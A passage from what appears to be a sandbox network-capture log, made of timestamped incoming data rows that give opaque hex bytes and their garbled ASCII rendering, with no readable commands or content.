3c f6 78 ad 31 76 b6 ef bc 4d 03 6d 00 12 85 a9 63 96 fa 64 f8 90 dd 60 fb 02 4d c5 4f 10 b8 05 93 36 9b 52 80 e5 ec 04 9b b3 af 5b 0d 36 3d ac 0f b8 bd 57 cc 20 cd 59 26 d3 Data Ascii: >-gHW}t6v_{)aw(!3#zqL6_yelXcnq#MtJ0fI2$b4s;F;eN"V`b><5XFu)~=xG^.5gf3:6Ef`<x1vMmcd`MO6R[6=W Y&
2021-12-01 12:26:35 UTC	135	IN	Data Raw: 02 a9 fe 64 ea 8b 6b 47 6d 60 6e c0 a5 81 57 68 ff 1a 87 dd d8 b7 bf d8 0c b9 41 59 98 bc 43 63 7c 17 77 77 71 66 41 7f c4 9a 66 a3 db 59 76 c8 08 0e f6 09 22 5f 21 3b e1 30 d7 89 c0 9e e4 e0 2b b9 57 b0 00 b6 c2 80 cd 0b cc 47 2b 0d dc dd ce a4 84 81 f6 2d fb 51 fe eb 9c 78 2c b0 32 e2 d5 e2 3a d2 0e 61 db e0 f5 ca 04 1d 28 1c 13 b4 2e 64 60 b8 9c c9 ff c3 f0 03 81 fb a6 f3 a3 01 fa 9d 7a de 00 97 c4 bd 19 b3 dd 57 17 4a 4e 06 64 9b b8 81 e4 3f 80 b8 27 bc 51 78 91 3e fa d0 36 2b ed 16 d9 cf c4 1f ea d0 1e 97 87 83 bd a9 ed 6c 49 70 0c 35 7f 5a 9b 57 16 32 eb fd fb 1d 0f ec a6 1e 6d 40 2e 3a e1 58 e3 13 bb fd 52 92 07 5f af 48 b8 d9 15 38 a4 27 11 b9 25 03 c4 2f c6 32 17 b5 1b 62 73 fa 4c 42 0c 69 30 88 e2 d7 42 3b 5f 2c 45 7d 2c 87 7d 49 cc 01 bf 47 79 Data Ascii: dkGm`nWhAYCc\|wwqfAfYv"_!;0+WG+-Qx,2:a(.d`zWJNd?'Qx>6+lIp5ZW2m@.:XR_H8'%/2bsLBi0B;_,E},}IGy
2021-12-01 12:26:35 UTC	136	IN	Data Raw: ce de 4f 09 3a 83 9b ae 19 27 76 02 05 61 92 42 cd 15 ca 66 0d 36 3a 01 d8 64 25 e4 e7 23 b6 68 c0 db a4 9a 95 4c 63 20 cc 2d ca 23 38 b2 f6 e2 ca 42 01 41 0f 35 70 bd 09 f6 7c ba e7 2e 89 38 cc b6 99 9c 09 e9 c9 9e 0a 8f 5d 3a ef 1f e7 45 95 8d 15 83 6a 72 66 0a 0c b5 05 ad 87 a6 1d c7 18 4a 00 d4 38 d6 0c a3 19 5b 2e ca 97 76 a7 33 f2 12 85 ad 63 3f ee 64 f8 10 d0 60 e8 24 6b ce cc 6e 21 24 e3 22 bb 3e 9f cd c1 9c be 98 94 fb 53 c3 3d ac 0b b8 13 43 cc 20 4c 54 26 c3 6b 15 ec 06 80 58 2a f4 28 0d 28 6a db 42 f7 6f be 0c 80 0b 63 7f ed 11 86 67 1b f9 52 4e 5c 5e 65 ec ae 58 36 b1 16 15 b2 30 91 5b 66 0f 39 b8 74 e2 cf 5c 67 32 e5 bb b3 8b 50 fd 7e 79 80 75 4e 36 65 6c 84 51 b9 8b 70 0e 3d 4b ee ae 5d 14 f4 97 9f f6 8e d2 92 41 90 db fb 2f 49 37 30 16 cd Data Ascii: O:'vaBf6:d%#hLc -#8BA5p\|.8]:EjrfJ8[.v3c?d`$kn!$">S=C LT&kX*((jBocgRN\^eX60[f9t\g2P~yuN6elQp=K]A/I70
2021-12-01 12:26:35 UTC	138	IN	Data Raw: dd 1e f2 4c 4a 5d 9e 4c 85 16 19 08 8c 0d 9c 03 fc 45 93 a4 69 a1 d5 f0 03 85 fb 52 e5 a3 01 7f ab 7f e1 24 b7 87 96 9f cd 64 3b 05 4e 6e 89 41 b3 95 19 c1 14 b8 18 79 b5 51 78 95 3e 78 c6 36 2b 68 3a dc f0 e0 3f aa fb 98 e9 3e 13 af ad cd e2 6b 58 21 ad 5a 71 a3 f7 48 3a eb fd ff 1d 85 fa a6 1e e8 6b 2b 05 c5 78 a2 38 3d 83 eb 27 15 5b 8f c5 9d f1 38 a0 81 0c 29 19 7b 08 c4 2f c2 32 84 a3 1b 62 f6 d3 49 7d 28 49 7e a3 60 a9 fb e2 4d 28 65 f1 22 af 50 d1 e9 2a 84 e7 27 67 04 f4 7e fb ae 31 c7 77 3f de ad ed cb 3f 31 1b 4a f9 7f 4c a4 30 49 16 1c 0c 90 75 d9 28 04 f4 8c 42 98 41 e7 1f 43 e1 22 bf 09 ce 47 3b 80 dd 12 a5 c5 95 cf a4 cd bb 76 9e 7c 41 05 34 3d af 34 22 56 c5 9e 8e 70 ec ac d9 a5 a2 a8 60 94 ab df ac cb bb 66 0a 9b 1b 58 e7 73 c9 91 32 7f 5d Data Ascii: LJ]LEiR$d;NnAyQx>x6+h:?>kX!ZqH:k+x8='[8){/2bI}(I~`M(e"P*'g~1w??1JL0Iu(BAC"G;v\|A4=4"Vp`fXs2]
2021-12-01 12:26:35 UTC	139	IN	Data Raw: d3 1d fc 11 f4 67 a4 33 d9 ca 76 bb 67 85 33 2f 12 85 ad d9 92 d6 75 de 2a 4e 4c ea 24 4d b8 57 10 b8 38 cb 0b 99 52 98 e7 43 78 02 b4 85 d9 53 18 3d ac 0b 02 ba 7b dd 06 77 cb 0a c1 6b 33 a5 99 fe c1 3c dc 01 2f 45 6d f1 c0 13 d3 92 1e a2 0b b6 7f ed 11 3c d3 23 e8 74 71 ef 77 48 ee 8e 3a 05 37 68 90 9b 1d 97 7b 0e 24 bb c6 77 c6 e2 4a 61 ab 8a ba b3 11 55 4c 7a 5f a0 d3 43 1e 48 4e ee 4e 93 0d 13 bf 11 49 ea 88 18 97 8a 0e 04 d3 a7 e0 0e 60 ff da 61 0a 44 8e 03 36 77 bc bf 55 bd a2 83 c3 bf 67 70 2c 84 2b 95 d8 c6 16 78 12 61 1b d5 f0 d8 42 6b 8c 74 c3 b1 8b 32 6d d8 3b c5 1e 31 b7 e5 e1 1d 04 99 7b 4a a9 ac 3b 85 6d 2e b4 2b cf 06 c4 b0 70 a6 42 f6 2d 18 e4 56 87 58 11 93 d9 67 ee f6 8e 31 8b fc 94 a2 54 da b8 26 0d d6 6b 56 09 d3 b7 7d e1 13 d9 7a e3 Data Ascii: g3vg3/u*NL$MW8RCxS={wk3</Em<#tqwH:7h{$wJaULz_CHNNI`aD6wUgp,+xaBkt2m;1{J;m.+pB-VXg1T&kV}z
2021-12-01 12:26:35 UTC	140	IN	Data Raw: b1 36 da 67 03 2e ed fa da 8b ba fd 76 06 c8 5e af 57 06 d4 15 2b 82 01 e6 3e 5b 9a e5 08 d9 12 5f ac 33 4f eb df 67 7a ac 37 e1 88 e2 d3 42 3d 4c 2c 45 f8 06 82 42 6d ec d9 94 c1 07 d4 2c ef 7e db 56 2d ef 5a 24 f6 86 c5 4d 47 82 98 34 64 5e 93 a1 10 dd 8d 39 21 18 76 d4 e6 23 d4 18 63 ac 5a c7 f5 4b f1 0a 89 23 e3 43 11 00 89 09 da 5c 90 ef 40 ec 2e 77 04 59 f6 32 3f 0c 69 15 b7 57 e5 da b5 9f fb b3 fa 90 a7 87 62 92 87 77 50 2c 23 67 0e bf da cf e6 73 53 2e 3a 43 6a dd ca 39 28 da fa 53 3e ce a3 de 31 08 c8 fb dc 6d 27 6d b6 17 cb 83 45 95 9c 66 48 c9 89 23 8e cd 95 05 50 ab 27 d7 ff 00 98 76 42 e8 d6 69 29 9b cc d1 ed fa c3 c0 ee 3d 83 ef 81 80 3c 2d f5 32 89 13 e5 bb da 18 25 db e1 e1 7a 6e a6 9f 71 34 f3 1a 54 54 42 43 86 7f 4b 66 f6 65 59 fd fd 6b Data Ascii: 6g.v^W+>[_3Ogz7B=L,EBm,~V-Z$MG4d^9!v#cZK#C\@.wY2?iWbwP,#gsS.:Cj9(S>1m'mEfH#P'vBi)=<-2%znq4TTBCKfeYk
2021-12-01 12:26:35 UTC	141	IN	Data Raw: 00 1f 45 8e b3 36 bf fd 76 97 38 b8 ea e7 e6 4c 41 12 11 9f 9e 99 56 41 6f 7b 80 6a 62 c1 54 6e 84 48 98 25 23 95 3c 4d c0 0c 4c 8c f5 97 01 f3 a6 c2 b4 61 65 ff d6 3e 4f bf 20 14 cd bd 9f bf 81 d3 9a d8 97 56 5a 01 80 01 15 8c dd 69 e1 17 41 19 f7 4b d9 d8 4e 3b 43 c8 80 ab 10 d6 d9 1b 2a 22 46 ae fa ed 28 01 b6 79 4c 85 00 c3 62 f5 2f b0 0f e8 b8 c5 b0 ea 19 4a c9 19 1e c3 e8 86 58 31 48 bb 7e ee e9 87 01 8e d3 96 a4 78 72 44 c1 95 d7 6f 72 21 6c b6 7d 7b ac d1 46 d4 9d 6a 64 29 fa 0a d1 b4 fb fc 8d a3 c8 7c 3d 1d 39 50 7c 30 df 97 ff ab 62 5a 49 48 d9 e7 88 95 5b ce 88 81 86 dd fc 8e e0 d9 0c a6 d0 54 98 ac 65 45 14 90 09 ee 50 71 57 5f ce 87 75 8b 6c 7e 5b dc 04 a8 82 92 23 5f 05 3f bf 31 d7 96 56 93 e4 f0 0d 9f 3e 37 7e 2f e3 aa db 2b c7 5a 0f 25 6b Data Ascii: E6v8LAVAo{jbTnH%#<MLae>O VZiAKN;C*"F(yLb/JX1H~xrDor!l}{Fjd)\|=9P\|0bZIH[TeEPqW_ul~[#_?1V>7~/+Z%k
2021-12-01 12:26:35 UTC	143	IN	Data Raw: 43 c7 f5 74 3e 3d a4 21 fc 1d 13 ab f5 90 dd 76 12 b1 39 ec 2e 73 be 57 d9 20 19 b6 ac 39 a5 71 e5 b5 ac 9f fb 8c ee 98 8a 85 7d cc 85 d8 2c b5 24 4d 88 e1 a2 cf e6 77 e9 27 15 52 4c 67 0e 15 39 fc fa 18 27 ce a3 e7 96 05 ca fb c1 6f 88 11 2f 10 e1 01 1b ee 9c 66 4c 73 81 0c 9f eb 2f c2 7c b9 01 d7 b8 19 98 76 7f 54 db 6b 29 82 eb 7f be 61 c2 c6 c0 9b 1e 77 80 80 a2 28 f6 22 af 33 9c 9f f7 0a 23 8a d4 e3 7a 71 93 16 7c 36 f3 03 73 fa 11 d8 87 79 65 c0 6c fd 58 fd 63 6e b4 72 23 cc 14 ca 4d da 8b 90 46 49 ff ed 30 45 83 0e ce c5 62 49 16 81 9b 32 16 8c 19 bd 24 09 97 62 fd 37 be 73 97 13 09 3b d3 46 15 e0 cd a1 e8 4a e1 db a0 a5 f1 65 4e 22 56 0e cd b4 60 0b 9e e3 ce 62 10 3f 1a 35 ea 86 0c c9 58 9a d0 06 0b 46 75 7f b9 98 29 9c c3 b6 27 17 78 11 d4 bb b9 Data Ascii: Ct>=!v9.sW 9q},$Mw'RLg9'o/fLs/\|vTk)aw("3#zq\|6syelXcnr#MFI0EbI2$b7s;FJeN"V`b?5XFu)'x
2021-12-01 12:26:35 UTC	144	IN	Data Raw: a4 63 83 f7 c7 20 7d b6 79 4a 8f 7e 9f fb f4 30 bf 07 c2 b8 c5 b6 5a ba 19 42 3e 3e c0 ca d4 5a 11 b3 3d 5b c3 e4 b7 09 f1 d3 96 a2 72 f3 19 58 94 c8 71 7a 04 6c b6 7b cb 0f 82 ce f3 bd 66 46 7a f8 2a c0 33 de d1 81 ad c5 2d 3f 1b 13 f6 1f 8a de 97 e4 93 43 75 4b 48 45 e8 23 f9 e4 ef 81 87 a6 89 de 97 fd 43 29 94 c9 5a 95 fa 67 43 3e 36 42 54 51 71 4c 6b ec a8 77 8b f0 71 f4 b0 bb 89 88 94 03 0a 27 1b a2 ab f2 a4 4b 9d e9 a7 0f 99 14 91 49 95 e2 aa c1 23 e1 5a 0f 23 db 59 b0 3b af 07 8c 94 ac 53 fa cb 42 5c 01 a2 8e e7 ae f2 1c f2 6a 31 f8 e0 d5 9b 0e 35 05 01 0c 9a 29 e0 1e 27 b7 4f 85 7a a6 01 85 db 79 d7 8e 13 46 98 00 ce 26 b7 a1 d5 3a b3 fd 25 15 62 63 1b 40 b5 bf 05 9a a0 ab 3e 5d 05 08 7a 95 1e 26 f4 1b 39 51 13 ac df e2 3f 8c a8 3d 97 a7 0d b7 81 Data Ascii: c }yJ~0ZB>>Z=[rXqzl{fFz*3-?CuKHE#C)ZgC>6BTQqLkwq'KI#Z#Y;SB\j15)'OzyF&:%bc@>]z&9Q?=
2021-12-01 12:26:35 UTC	145	IN	Data Raw: d5 be f6 95 1f b8 0e 5d c0 fb f1 0c b0 f4 71 b3 1b c0 c0 ea 3d 5b cb 81 80 b9 29 f0 0d ad 33 00 90 5c 66 9c ab fa e5 5a 08 b1 b7 5c ac d6 31 6c f4 1c a3 85 7f 4f 66 4e 41 59 fd 78 47 b3 5d 21 cc 88 c5 e6 b6 34 b1 69 4f df 97 12 eb a3 94 eb f7 7d 47 1b f9 99 34 3c 2a 02 01 25 09 8c 63 e5 18 bc 73 0b 1c a2 57 6c 67 25 e6 ed da ca f1 c1 41 85 97 ee 6b 43 5b 54 08 e7 12 98 b7 9f e3 d5 6a 09 10 18 35 76 89 a3 a5 e7 bb e1 00 2b 3a 57 b7 99 02 0c ae d9 b8 2a 69 7a 17 fe 19 69 0a 94 8d 02 8b c3 65 66 0c 3c 1f 56 36 86 a0 33 65 1b d1 01 d4 a6 d3 4a b3 3f 7b c9 ed ba 67 a1 bc bc 13 85 ba 6b 9a f9 64 fe 20 7e 33 73 25 6d e0 6e 6e ba 25 e3 bc be 7f 8c eb e1 78 99 b5 85 fd c3 8a 3c ac 14 97 b7 7b ce 20 51 56 8d bf f2 12 c6 84 de be 29 f4 2c b7 60 46 c9 64 4d 35 91 1e Data Ascii: ]q=[)3\fZ\1lOfNAYxG]!4iO}G4<%csWlg%AkC[Tj5v+:Wizief<V63eJ?{gkd ~3s%mnn%x<{ QV),`FdM5
2021-12-01 12:26:35 UTC	146	IN	Data Raw: d6 18 45 b2 c7 b9 6c 55 e1 26 84 af e1 45 3b 1c d2 bd c9 7a b4 41 a2 ed 2e 57 3f 5a db 20 06 39 a1 39 b5 57 c3 b4 2c e1 62 ad d9 bc aa 0a 60 94 ad 6f 0b 98 33 41 2a 10 39 ce e6 53 7f 2d 17 52 5b d5 06 3a 28 dc f0 b6 5b 57 a2 c7 1d 05 5a f9 da 47 3f 36 02 07 ed a7 f5 75 9d 66 68 e4 8a 0e 9f f3 9d ca 53 ab 21 dd 17 65 01 77 5f c4 db fa 2b 9d e6 cd b6 4e d3 e6 ca 8c 62 ee 81 a0 1f 2e d8 20 b8 1b 2b b8 da 1e 2f 28 84 78 7b 71 b7 97 ce 34 f3 1c e4 f7 11 cb a1 5f dd 44 12 64 79 47 41 4e 9b 68 0b e1 8c ef 66 e2 2f ce f0 4a ff e9 30 78 a1 0e ce 40 4a 4c 2a a5 bb a7 3e 0a 67 04 99 2f 93 42 da 1d 93 71 0d 30 0e ab 8b ff 24 e2 c9 81 5c f3 c1 db 3a 9f d1 5c 45 00 c2 0a e7 32 3e 2f b9 e3 ca 5a 09 10 18 35 76 89 a3 a5 e7 bb e1 00 2b d3 57 b7 99 02 0c ae d9 b8 2a 80 7a Data Ascii: ElU&E;zA.W?Z 99W,b`o3A9S-R[:([WZG?6ufhS!ew_+Nb. +/(x{q4_DdyGANhf/J0x@JL>g/Bq0$\:\E2>/Z5v+W*z
2021-12-01 12:26:35 UTC	147	IN	Data Raw: 4f d8 3b c1 1e f3 ac e5 e1 9a 09 99 68 6c 8f 33 bf fb f4 0f 57 08 ef ba dc 98 5d 3e 67 dd 15 bc ba 73 87 58 15 93 11 7c ee f6 0b 0c 8e c0 b0 82 e4 f2 3a 58 b4 31 4c 52 29 77 9e 50 e3 89 fa 7d 74 c3 fb 67 29 fe 0a 77 ab fb fc 09 ae c8 6c 1b 3b a4 d4 02 a9 fe 7e dc 8b 6b 47 40 60 6e c0 a5 81 57 6c ff 1a 87 dd d8 b7 45 db 0c b9 41 59 98 bf 43 63 86 14 77 77 71 83 74 7f c4 9b 5d a6 f4 5b 70 e4 a4 f6 11 91 23 5b 05 a2 a0 31 d7 13 7f 96 db d4 2d 20 16 b1 00 96 18 8d df 0b d3 54 27 08 f3 df c8 88 28 79 11 b5 fa 55 da 71 da 79 2c 2a 8d ea ea d6 3c 48 48 60 db c0 d3 ac 16 1d 37 0a 24 b1 01 66 66 94 30 31 18 5b f1 07 a5 60 e1 f2 a3 9b 45 95 45 ea 06 0c 83 bc 19 93 f2 12 05 4a 51 16 68 9e 97 83 e2 13 2c 40 c0 24 50 7c b5 a2 be d1 36 b1 52 1e e6 fb c2 83 ae d1 1e b7 Data Ascii: O;hl3W]>gsX\|:X1LR)wP}tg)wl;~kG@`nWlEAYCcwwqt][p#[1- T'(yUqy,*<HH`7$ff01[`EEJQh,@$P\|6R
2021-12-01 12:26:35 UTC	148	IN	Data Raw: e1 9d ca 53 ab 21 dd 13 65 01 77 5f c4 db b7 2b 9d e6 cd b6 4e d0 e6 ca c1 62 ee 81 a0 80 23 d8 20 b0 17 2e 97 d8 18 03 80 7c 9f e3 70 b3 b3 7c eb f1 1c 7e 48 19 f7 95 59 6f 9b 10 64 59 dd 2d 65 9b 70 3c c5 a6 c2 62 c8 ab 9a ef 35 66 ec 10 ef 83 d0 cc da 6f fb 1e ae 89 12 1c d4 65 24 25 29 c0 69 cd 35 a1 78 25 1b 26 29 f3 4c a3 9c 54 a0 c8 f5 e1 04 a2 ba fc d7 46 0d 44 2e c7 ed 1c 92 9f c3 94 69 21 3d 05 3a 58 8e 23 db 78 90 67 7a 92 47 55 b3 b9 78 2b 83 c8 04 2f 38 6a 31 de d9 c5 2f 94 ad 78 88 ee 67 79 06 3e b0 2a af 81 8a b1 3b ff d2 01 d0 1c 17 65 a2 19 c1 91 c2 a8 41 a1 f2 9b 13 85 8d 3a 9c fb 64 e7 2e d0 60 e8 24 6b ce cc 6e 21 24 e3 22 bb b0 9c cd c1 9c be 98 94 fb 53 4d 3e ac 0b b8 02 7d cc 20 4f 54 26 c3 6b 15 ec 02 80 58 2a f4 28 0d a6 69 db 42 Data Ascii: S!ew_+Nb# .\|p\|~HYodY-ep<b5foe$%)i5x%&)LTFD.i!=:X#xgzGUx+/8j1/xgy>;eA:d.`$kn!$"SM>} OT&kX(iB
2021-12-01 12:26:35 UTC	150	IN	Data Raw: 7d ce 9f ae 86 dd c2 bf d0 db 0c bf f1 fa cb 37 64 43 3a 36 74 74 51 71 c9 5a e9 97 53 ab f5 58 76 ce 02 ae a5 90 23 40 34 33 8f 33 d7 8f 70 3d b7 6b 0c 99 10 91 04 b5 e2 aa 45 2e e1 4a 29 05 f5 dc ce a2 8e 30 a5 b4 fa 4e eb e3 f5 7b 2c b6 82 41 86 69 1d f2 4e 40 de e3 d5 84 8c 38 05 11 2a bc 06 65 60 be 96 07 ac 5a f1 1c 8a f3 ce f0 a3 07 4a 3e 29 55 27 b7 85 9c 1f b0 fd 3a 9f 6f 63 0b 66 93 93 80 e4 39 8a 69 74 25 50 67 9a 36 91 d3 36 2d 5d b1 8a 44 e3 3f a8 f1 19 94 a7 12 35 8c c0 62 4c 78 26 34 7f 5c 91 b7 45 ab ea e3 d7 10 4a ed a0 34 75 1b 9a 29 c7 7c 84 1a b8 fd 72 bc 30 72 be 71 bc f9 3b 3a a4 01 55 12 5b 9a d9 07 ef 10 5f b2 31 e4 97 46 60 50 2e 69 71 8a e2 d7 f8 c6 60 3e 63 42 2a ac 50 4b ec 73 b8 c1 07 eb 37 dc 53 d9 49 20 ed f1 58 6f 81 ef cf Data Ascii: }7dC:6ttQqZSXv#@433p=kE.J)0N{,AiN@8e`ZJ>)U':ocf9it%Pg66-]D?5bLx&4\EJ4u)\|r0rq;:U[_1F`P.iq`>cBPKs7SI Xo
2021-12-01 12:26:35 UTC	151	IN	Data Raw: 1a 80 46 bd 72 f8 87 ff b2 a0 4d f1 b3 77 5b 38 54 73 42 47 38 2f 6a cd ff 85 f3 ef 54 95 a1 0d 11 72 4a dd ce 91 ad 94 d2 2a 99 71 c2 01 50 ab be fb f2 0e 25 2f 99 32 32 de 51 58 36 16 bd 7a 8d 23 c3 c0 44 ce 85 08 0f 6f 03 cd 65 fc d4 a0 62 03 38 8f 0e de 24 aa 26 c5 7e 6d f1 8e d2 1f e9 69 ee 3c ec df 29 df a5 23 b7 7b 8c 36 cf 18 3d bb 72 64 cd 1c 8d 4b f7 41 d5 ed e0 52 99 b4 d2 cc 63 9a 2e af 1e dc b4 4d da 3d 14 22 37 d2 7b 11 c0 84 ea c5 7c ce 38 0a 6b 19 b2 43 71 40 ab 30 89 25 2e 55 cf 6f c3 ef 05 f4 31 2f 5a 6b 58 86 dd 47 1d 41 7e bc 82 e8 5b a0 d2 9a b6 5a 26 12 61 ce b2 d1 4f 71 60 54 b9 bc b6 e6 6a a5 9a de db 90 54 8c 41 83 9b 52 e4 85 16 6c d1 d7 18 78 e3 26 4c 2f 5d 96 0e 21 0c db a3 6e dc fe 27 4e 5e a0 50 08 64 34 58 fe c0 86 09 b1 20 Data Ascii: FrMw[8TsBG8/jTrJ*qP%/22QX6z#Doeb8$&~mi<)#{6=rdKARc.M="7{\|8kCq@0%.Uo1/ZkXGA~[Z&aOq`TjTARlx&L/]!n'N^Pd4X
2021-12-01 12:26:35 UTC	152	IN	Data Raw: 08 bb c8 ee 23 28 d7 2c e5 56 83 0a 48 60 73 33 94 e9 0a fb 70 8b 38 32 13 bf 35 5e 8e a1 cd cd 8f 05 ea d8 ec 9e 46 f1 76 19 76 11 37 d6 55 b4 d6 7f 7d 3b 7a ac 96 ae 57 cc ae 14 86 b1 05 bb bc c7 2d 11 34 5d 56 12 3c d6 e8 48 fa 8d 89 88 4f 3d 84 da 3d c9 3b 6f 45 b9 02 d7 62 d9 83 09 5d 45 14 92 6c be a4 01 24 a3 30 35 3f 50 98 9b 1a d9 1a 54 ba 0a 6f f1 98 52 53 2a 54 67 9d f7 d6 41 c7 6b 5f 5b 7a 30 e2 75 7d e0 28 b2 fc 03 d7 2a dd 52 e7 7c 0a ff 45 1f d0 bd df b3 0d 20 a1 b0 bf a4 a5 49 ca 1d d4 df d5 9b c4 6b a9 b3 42 cf 99 49 94 57 2c 9d 2e e4 72 fa 21 97 e3 59 37 77 31 fa 7e 2e 42 4f d7 87 6e 9d 28 c7 f6 c5 63 fc 4b fb 6f 34 71 64 0b 5f 23 44 35 70 9a 6d 51 72 a4 3a ae a6 8f 03 b1 16 5f fc 46 88 de ff cd 62 be b4 b8 42 4c ad aa 60 24 5a 98 94 13 Data Ascii: #(,VH`s3p825^Fvv7U};zW-4]V<HO==;oEb]El$05?PToRSTgAk_[z0u}(R\|E IkBIW,.r!Y7w1~.BOn(cKo4qd_#D5pmQr:_FbBL`$Z
2021-12-01 12:26:35 UTC	154	IN	Data Raw: ec 75 bb 13 49 e8 5c 00 d7 bd 4f a4 5a f8 6d 2e a7 18 13 fb 6b a9 6e cd 4a 86 d5 c9 0f c7 eb 8f d6 63 a2 77 db 0b d2 97 4c a0 44 31 01 3b f2 01 71 aa f7 de a3 42 9f 47 5a 62 52 e0 6b 43 37 ee 35 82 1a 20 14 bd 31 cf df 4b f4 55 56 4d 27 18 e5 a3 53 08 76 6d 84 bb 3a 9d 3d 52 54 77 f7 f0 db a6 0b 13 5d 86 8b ff 83 06 05 45 5f a0 51 30 6f 6c 42 aa 62 f5 29 25 be 09 62 8f f5 4f 7a 98 a8 36 b6 c5 b3 dc 4d ed b6 2c b8 ee 50 e4 d7 15 2e 21 90 52 1c 48 44 78 b1 8e d5 4c af 0f 6e c8 e5 31 c1 e7 98 61 c2 16 b1 d0 ad a4 5b 01 44 f1 35 2f 86 79 d9 af 47 15 44 f9 d8 40 8f a6 0d 38 03 59 57 dd 44 8f 4e 0c 6e 21 dd e5 bf 48 ec fd 4f 67 0b cc ce 69 26 f5 65 78 4a b2 35 43 06 2c 92 20 ea 98 55 43 fd 90 ea 86 43 ce 6e 76 01 e6 03 50 c7 c9 86 48 d3 67 03 4f 53 39 3d 57 9d Data Ascii: uI\OZm.knJcwLD1;qBGZbRkC75 1KUVM'Svm:=RTw]E_Q0olBb)%bOz6M,P.!RHDxLn1a[D5/yGD@8YWDNn!HOgi&exJ5C, UCCnvPHgOS9=W
2021-12-01 12:26:35 UTC	155	IN	Data Raw: 10 36 e0 0e d1 aa 25 63 f7 70 7a 76 1a d8 97 7f a8 73 31 c5 30 56 c4 fb 42 78 16 60 5b d3 a1 b6 01 98 23 58 28 20 70 dc 2a 30 b1 37 c0 b6 64 81 4c d2 7a d4 49 26 88 5f 2a e0 82 d3 ed 30 13 9a 3d 7f 59 77 b1 1c cd 06 04 22 2c 53 e0 3d 75 e4 0c 7d b2 55 e2 d4 7c c4 01 95 2f c2 6e 12 b3 fe bc ef 68 be a4 b8 83 33 1c f9 1f bf 5c 7f 4d e9 70 30 c8 59 74 46 1d 6f 43 39 2e 07 17 f2 02 3b 14 ac 38 af 98 86 65 b2 24 3d ae 1d d5 d6 96 d8 1b c4 d0 d5 21 31 9b e7 2c 55 21 aa e7 0f 38 6b f6 06 b1 9a b7 62 59 c1 c7 3b b7 e9 f2 17 d8 39 4f 6a 21 8f 72 f1 20 41 ce 3e d1 8c 63 28 b9 9a 11 72 c8 04 ed 4f 1f 41 85 f0 3d 21 10 23 8c 5b ba 17 9c ee 30 66 b2 ad 02 56 56 d3 d1 19 41 ad c7 6c f5 95 4f d2 28 18 94 a9 a1 ef 81 ca 1c f5 b6 89 18 4e d3 8d f5 7c d3 b6 a1 7e 58 9f f3 Data Ascii: 6%cpzvs10VBx`[#X( p07dLzI&_0=Yw",S=u}U\|/nh3\Mp0YtFoC9.;8e$=!1,U!8kbY;9Oj!r A>c(rOA=!#[0fVVAlO(N\|~X
2021-12-01 12:26:35 UTC	156	IN	Data Raw: 80 22 62 50 f8 d3 c3 fc 10 09 03 15 f8 06 29 52 27 13 f1 2e ee 7e 24 ab 72 60 ac 9c 6b 56 a2 a7 47 ed ee fd fe 2e da df fd 3e 77 89 38 55 9a 9a 83 0a 94 93 c6 8c 94 20 71 65 e0 3e f1 95 57 57 c9 25 56 36 da 6a ed 28 47 22 63 ea ba 9f 2c fd f7 44 fb 0f 7e 94 ee d6 39 e7 68 a2 91 62 59 70 25 25 e7 71 f7 79 70 00 66 be e2 ad 3d f1 e0 0b 24 44 83 d3 63 62 ac 05 30 7a ce 5f 65 30 03 f5 54 d5 ba 67 22 88 a7 f2 9b 4d 95 0a 60 0a ba 0f 53 95 aa c9 09 d7 33 5b 5c 49 0a 0c 79 fe b6 84 c3 1c cf 62 16 04 6f 0a d1 cf d3 c3 ce 59 28 24 f0 7d 01 00 07 43 59 02 7b 76 fa 59 3c 99 53 3e c9 e2 9e b9 c3 df e2 c7 f5 d6 72 29 dc 0a 5a e2 d9 6a 94 2a 38 22 90 f9 95 42 fa 78 9d c4 1a e2 8a a4 72 c9 54 e4 54 e5 a8 e2 80 40 81 09 42 7c be 8e 86 ba b1 1b 96 ac e7 75 db ea ac 5f 0d Data Ascii: "bP)R'.~$r`kVG.>w8U qe>WW%V6j(G"c,D~9hbYp%%qypf=$Dcb0z_e0Tg"M`S3[\IyboY($}CY{vY<S>r)Zj*8"BxrTT@B\|u_
2021-12-01 12:26:35 UTC	157	IN	Data Raw: bd 45 88 c8 bb e7 7f 4b 9a 7a df 29 16 16 bd 1d b3 5f ca a0 83 b1 d8 93 c8 a3 9c 9b 67 c2 e8 af 6b a3 2f 4e 35 be 06 eb df 54 f9 17 07 61 62 da 05 42 30 ed ed 04 1f f1 8a c9 16 26 f6 cc ff 67 b6 ed d4 e2 21 45 a3 be 5e b0 cb c1 23 98 64 09 71 2b 85 61 f7 3d 4f d4 79 95 99 19 29 b6 be 6a 3c b3 76 8e 28 3a 39 bb c3 14 6f 6c 1b de 3e d7 59 de f2 50 27 b8 a6 19 37 12 9a 92 55 4e b9 c6 58 ca db 5b b8 51 56 af 8d ea 90 e9 dd 25 d3 c7 1f f8 ac 72 23 41 fe 44 20 26 fb cf 6f 47 ae 6f 25 b3 6c 66 c5 c7 a8 18 05 a9 b9 9e f6 be b1 a4 22 fd 65 b1 10 de 8d 8c 8d 8b 08 df 9a 5d 52 3a 4e 8f bf ba cd c4 84 25 19 51 2a 6e 92 44 69 e1 fe e4 ba 1f 61 4e 4a 6d 28 d8 44 bb 2e e8 b2 59 50 2b 1d cd f5 f7 52 ea 81 f9 6a 67 00 61 8d 52 b0 69 ec f3 78 cd ad 3d 0f 68 69 e4 4a cd be Data Ascii: EKz)_gk/N5TabB0&g!E^#dq+a=Oy)j<v(:9ol>YP'7UNX[QV%r#AD &oGo%lf"e]R:N%Q*nDiaNJm(D.YP+RjgaRix=hiJ
2021-12-01 12:26:35 UTC	159	IN	Data Raw: e6 32 ac 17 d5 89 eb 9b 46 23 7e c1 33 3e df f9 9e 49 17 a1 ba 6b c6 d4 a0 04 99 fb aa a0 4c c9 15 65 a1 e8 42 58 38 55 9b ba 2b 48 39 a9 2f 74 b9 ad ef 2d ce 1e 6b 3c 2c 5d 51 3f ab e6 ec e4 2e e9 45 2d 73 1f 6e 9a a3 97 9c 9e 18 6e 5a ad 30 6c 66 72 2b 3b 62 1c 00 d7 47 31 8a 4d 5e 81 82 ea ea 9f 8b a6 8f ab b6 78 5d b3 53 5e db e2 4e a1 02 04 21 a4 cc a9 a2 0b be 40 02 c5 23 50 53 a3 07 85 29 9a 1d 4a 09 7c b2 70 e4 a0 86 6e 66 63 13 0b 9a 1e 01 51 f3 52 71 6d 80 b4 06 18 7f 59 7f 8a 4c e4 da 6e 5c 93 f3 53 55 6f 40 7c ed 77 2c 32 eb e5 09 c9 2c bf 57 cf 87 81 9d ed 53 35 f9 06 90 30 c6 dc e5 76 cb d5 1b 73 7d 